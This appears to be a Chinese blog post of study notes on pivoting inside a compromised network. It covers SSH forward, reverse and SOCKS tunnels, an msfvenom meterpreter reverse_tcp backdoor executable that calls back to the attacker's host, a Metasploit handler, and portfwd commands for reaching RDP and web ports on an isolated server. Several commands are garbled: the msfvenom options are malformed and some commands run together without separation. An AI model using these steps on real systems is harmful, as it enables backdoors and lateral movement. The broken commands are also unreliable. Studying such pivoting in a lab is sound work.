拓扑图


假定攻击机已拿下web服务器且无法访问数据库服务器,以下未说明的ssh命令均在web服务器上完成

ssh正向连接

ssh -CNfL 0.0.0.0:5555:10.10.10.124:80 web@127.0.0.1

正向代理完成后,可以在攻击机访问192.168.1.100:5555即可获取到10.10.10.124的80端口部署的内容。

ssh反向连接

ssh -qTfnN -R port:host:hostport remote ip
ssh -qTfnN -R 2222:127.0.0.1:22 root@192.168.0.200
攻击机:ssh -p 2222 web@127.0.0.1curl http://10.10.10.124

web服务器向攻击机完成反向连接后,攻击机ssh -p修改22端口为2222端口连接到web服务器使用curl命令即可访问10.10.10.124

sockets代理

ssh -qTfnN -D 10000 root@192.168.0.200

之后浏览器走192.168.0.200:10000的代理即可

端口映射

metasploit生成后门:

msfvenom -p windows/meterpreter/reverse_tcp|host=192.168.0.200|port=12345 -f exe >/var/www/html/aa.exe

msf监听模块
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.200
set lport 12345
exploit

在目标机上运行后面程序,攻击机上监听就会返回meterpreter会话

攻击机:portfwd flush (清除下记录)portfwd add -L 192.168.0.200 -l 2022 -p 80 -r 10.10.10.124

成功映射之后,访问192.168.0.200:2022即可看到10.10.10.124:80端口部署的内容

端口转发

攻击机:portfwd add -l 5555 -p 3389 -r 192.168.1.100rdesktop 127.0.0.1:5555

接着在meterpreter会话实现转发目标的3389端口,在攻击机本地访问127.0.0.1:5555端口即可实现远程桌面登录,进而访问10.10.10.124

开始学习内网很多地方不是很明白,若有错误还望师傅们指正。

SSH隧道技术及端口映射与转发相关推荐

  1. 老戚的黑科技之SSH隧道技术

    隧道顾名思义让不通的地方变通.SSH隧道技术也是同样的道理,借用SSH这个工具,通过SSHClient和SSHServer之间建立一条TCP通道,从而打通二台设备,于此同时分别监听各自的一个端口号,如 ...

  2. 公网与私网的区别 ?如何进行通信?(NAT技术,端口映射技术,)

    目录 一, 公网与私网介绍两者间的联系 二,公网ip与私有ip的区别 三,私有网络如何访问公有网络? 1,端口映射技术 2,nat技术 (网络地址转换 ) 五,VPN技术 六,总结概述 一, 公网与私 ...

  3. SSH隧道技术----端口转发,socket代理

    原文的原始出处不详,本文也是在复制引用了某篇转载,并做了必要的整理与编辑. 本文的受众 如果你遇到了以下问题,那么你应该阅读这篇文章 我听说过这种技术,我对它很感兴趣 我想在家里访问我在公司的机器(写 ...

  4. 局域网内配置服务器方法--p2p技术、端口映射、网络域名

    最近公司要求在内网搭建服务器提供给外网使用,最主要就是在出差时能过方便的提供数据查看服务.局域网里面的PC机的IP地址只是用来内部地址区分的(内网IP),一般都为192.168.1.XX,当要和外网建 ...

  5. NAT技术与端口映射使用方法

    静态NAT: 本地地址与全局地址(公网)之间一对一映射,即一台主机对应一个公网IP. #ip nat inside source static 192.168.1.10  188.188.90.18 ...

  6. windwos 端口转发、端口映射(PassPort Control)

    windwos 端口转发.端口映射 有的vpn只能在windows上运行,所以使用mac时,需要安装虚拟机,在虚拟机中运行vpn然后进行开发. 这时,如果想要在mac端进行开发,则需要虚拟机windw ...

  7. SSH隧道 / SSH穿透

    在开发微信公众号或小程序的时候,由于微信平台规则的限制,部分接口需要通过线上域名才能正常访问.但我们一般都会在本地开发,因为这能快速的看到源码修改后的运行结果.但当涉及到需要调用微信接口时,由于不和你 ...

  8. 建立稳定安全的SSH隧道

    本文将教你如何通过 SSH 隧道把本地服务映射到外网,以方便调试,通常把这种方法叫内网穿透. 目的 把运行在本地开发机上的 SSH 服务(或其他服务如HTTP等)映射到外网,让全世界都能通过外网 IP ...

  9. 关闭ssh隧道的几种“优雅”方式

    关闭/断开 ssh隧道转发(ssh连接)的几种方式 网络环境 方法一(通过文件进行通道管理,本质上文件为socket文件) 方法二(通过进程找pid杀掉进程) 方法三(只在监听端口的服务器上有效,通过 ...

最新文章

  1. d3.js 旋转图形_【IOS游戏推荐】百万畅销游戏刚从STEAM移植至IOS平台,在极端地形中冒险前进!——旋转轮胎:泥泞奔驰...
  2. VMware vSphere 6简单部署---VCSA( vCenter Server Appliance)部署
  3. Android开发之如何在debug模式下打出release正式包
  4. java中rank函数_sql rank()函数
  5. ngnix 作用(通俗易懂)【转载】
  6. 漫话:什么是云计算?
  7. 大一计算机专业,大一计算机专业学生
  8. 最完整UI库Kendo UI发布R3 2018|附下载
  9. 【转】一个小妙招能让你在服装上省下好多rmb
  10. 芝麻HTTP:TensorFlow LSTM MNIST分类
  11. 小米手机通过USB连接电脑,共享使用电脑的网络
  12. UVA 12304 /// 圆的综合题 圆的模板
  13. 易基因|ChIP-seq分析方法:实用的工作流程和高级应用
  14. 自动快捷使用数据采集器采集某网站数据---后裔采集器
  15. Word删除空白页方法汇总
  16. ExtJS初级教程之ExtJS Tree(三)
  17. 芜湖小学计算机能力测试20111年 c语言,2011年计算机二级考试C语言十套上机题(1)...
  18. 【Microsoft Azure 的1024种玩法】四. 利用Azure Virtual machines 打造个人专属云盘,速度吊打某云盘...
  19. 飞翔的小鸟游戏基于arm开发板制作
  20. 无线 配置ldap 认证服务器,在无线局域网控制器wlcs上使用ldap的web认证配置示例-cisco.pdf...

热门文章

  1. 视频教程-SQL语句从入门到精通迅速提升篇视频课程(Oracle零基础版)-Oracle
  2. 开源阅读书源_超强小说阅读软件
  3. lang:C++自定义异常类——用来处理自制编程语言的异常信息
  4. GuruDigger - 我们帮助靠谱的互联网产品找到志同道合的创业合作工程师。
  5. 华为od 2023 | 什么是华为od,od 薪资待遇,od机试题清单
  6. AutoCAD下载的具体步骤:个人用户AutoCAD下载安装指南
  7. 大疆笔试题目总结--参考历届试卷
  8. 【自学前端】我只学这些够吗?好难
  9. Inno Setup的下载、安装、中文向导文件等
  10. 【Win10 UWP】URI Scheme(一):Windows Store协议的解析和使用